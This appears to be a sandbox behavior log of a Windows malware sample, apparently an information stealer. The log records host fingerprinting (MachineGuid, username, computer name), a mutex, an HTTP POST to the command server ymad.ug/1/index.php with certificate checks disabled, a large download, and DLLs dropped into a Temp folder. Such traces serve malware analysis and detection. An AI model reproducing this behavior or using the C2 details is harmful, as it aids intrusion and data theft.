Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x76c5d4c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDllDirectoryW, address_out = 0x76cb004f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocalTime, address_out = 0x76c35aa6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x76cb44cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDriveStringsA, address_out = 0x76c3e4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74d540e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupAccountSidA, address_out = 0x74d81daa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessAsUserW, address_out = 0x74d4c592 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74d4df04 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyW, address_out = 0x74d52459 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x74d5445b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumValueW, address_out = 0x74d548cc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextA, address_out = 0x74d491dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Module Load module_name = user32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayDevicesW, address_out = 0x74f7e567 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wvsprintfA, address_out = 0x74f6aad3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x74f62e69 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x77130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x771effc1 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Mutex Create mutex_name = A6CF1546B-343A2EC6-63D8DC88-FF4A8C5D-82A11F69 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Module Get Handle module_name = wininet.dll, base_address = 0x0 False 1
Fn
Module Load module_name = wininet.dll, base_address = 0x753d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x753f49e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x753f4c7d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersA, address_out = 0x753edcd2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x754618f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x753dd075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x753e75e8 True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = ymad.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /1/index.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request url = ymad.ug/1/index.php True 1
Fn
Data
Inet Read Response size = 65636, size_out = 9393 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 908 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65566 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 5896 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 16044 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 5537 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 32120 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 8760 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 3472 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 12588 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65636 True 2
Fn
Data
Inet Read Response size = 65636, size_out = 36628 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 32120 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65589 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 27900 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65596 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 16300 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 42484 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 14592 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 64353 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 2
Fn
Data
Inet Read Response size = 65636, size_out = 57068 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 17561 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 46801 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 46729 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 17632 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 55488 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 8872 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 3
Fn
Data
Inet Read Response size = 65636, size_out = 61448 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 2
Fn
Data
Inet Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65558 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65572 True 2
Fn
Data
Inet Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 39532 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65564 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65596 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65604 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 4808 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65550 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 11020 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65564 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 65565 True 2
Fn
Data
Inet Read Response size = 65636, size_out = 29851 True 1
Fn
Data
Inet Read Response size = 65636, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
File Create Directory C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\ True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll, size = 18744 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-datetime-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-datetime-l1-1-0.dll, size = 18232 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-debug-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-debug-l1-1-0.dll, size = 18232 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-errorhandling-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-errorhandling-l1-1-0.dll, size = 18232 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-2-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-2-0.dll, size = 18232 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l2-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l2-1-0.dll, size = 18232 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-handle-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-handle-l1-1-0.dll, size = 18232 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-heap-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-heap-l1-1-0.dll, size = 18232 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-interlocked-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-interlocked-l1-1-0.dll, size = 17856 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-libraryloader-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-libraryloader-l1-1-0.dll, size = 18744 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-localization-l1-2-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-localization-l1-2-0.dll, size = 20792 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-memory-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-memory-l1-1-0.dll, size = 18744 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-namedpipe-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-namedpipe-l1-1-0.dll, size = 18232 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processenvironment-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processenvironment-l1-1-0.dll, size = 19248 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-0.dll, size = 19392 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-1.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-1.dll, size = 18744 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-profile-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-profile-l1-1-0.dll, size = 17712 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-rtlsupport-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-rtlsupport-l1-1-0.dll, size = 17720 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-string-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-string-l1-1-0.dll, size = 18232 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-1-0.dll, size = 20280 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-2-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-2-0.dll, size = 18744 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-sysinfo-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-sysinfo-l1-1-0.dll, size = 19248 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-timezone-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-timezone-l1-1-0.dll, size = 18224 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-util-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-util-l1-1-0.dll, size = 18232 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-conio-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-conio-l1-1-0.dll, size = 19256 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-convert-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-convert-l1-1-0.dll, size = 22328 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-environment-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-environment-l1-1-0.dll, size = 18736 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-filesystem-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-filesystem-l1-1-0.dll, size = 20280 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-heap-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-heap-l1-1-0.dll, size = 19256 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-locale-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-locale-l1-1-0.dll, size = 18744 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-math-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-multibyte-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-multibyte-l1-1-0.dll, size = 26424 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-private-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-process-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-runtime-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-runtime-l1-1-0.dll, size = 22840 True 1
Fn
Data
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-stdio-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-string-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-string-l1-1-0.dll, size = 23488 True 1
Fn
Data
